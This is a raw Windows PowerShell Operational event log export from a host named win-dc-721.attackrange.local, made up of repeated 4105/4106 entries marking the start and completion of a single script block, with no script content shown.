LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471994
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471993
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471992
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471991
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471990
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471989
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471988
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471987
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471986
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471985
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471984
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471983
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471982
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471981
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471980
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471979
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471978
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471977
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471976
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471975
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471974
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471973
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471972
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471971
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471970
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471969
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471968
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471967
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471966
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471965
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471964
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471963
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471962
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471961
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471960
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471959
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471958
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471957
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471956
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471955
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471954
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471953
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471952
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471951
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471950
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471949
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471948
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471947
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471946
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471945
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471944
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471943
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471942
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471941
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471940
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
